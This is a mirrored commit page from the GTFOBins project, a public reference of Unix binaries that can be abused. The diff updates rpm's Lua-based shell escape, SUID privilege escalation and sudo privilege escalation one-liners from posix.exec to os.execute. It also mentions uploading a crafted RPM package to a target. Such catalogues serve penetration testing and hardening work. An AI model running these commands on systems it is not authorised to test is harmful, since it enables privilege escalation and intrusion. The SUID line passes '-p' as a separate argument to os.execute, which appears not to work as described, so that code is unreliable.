mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Use os.execute instead of posix.exec in rpm
From rpm versions 4.9.0 and on, posix.exec() will return an error unless called from a child process created with posix.fork(). os.execute() may be used instead. This change is documented in these two resources: - http://rpm.org/user_doc/lua.html - https://rpm-packaging-guide.github.io/ Close #53.
This commit is contained in:
parent
52a2f4cdc7
commit
3bd955e8cc
@ -1,11 +1,11 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
shell:
|
shell:
|
||||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||||
suid:
|
suid:
|
||||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
- code: ./rpm --eval '%{lua:os.execute("/bin/sh", "-p")}'
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||||
- description: |
|
- description: |
|
||||||
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
|
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user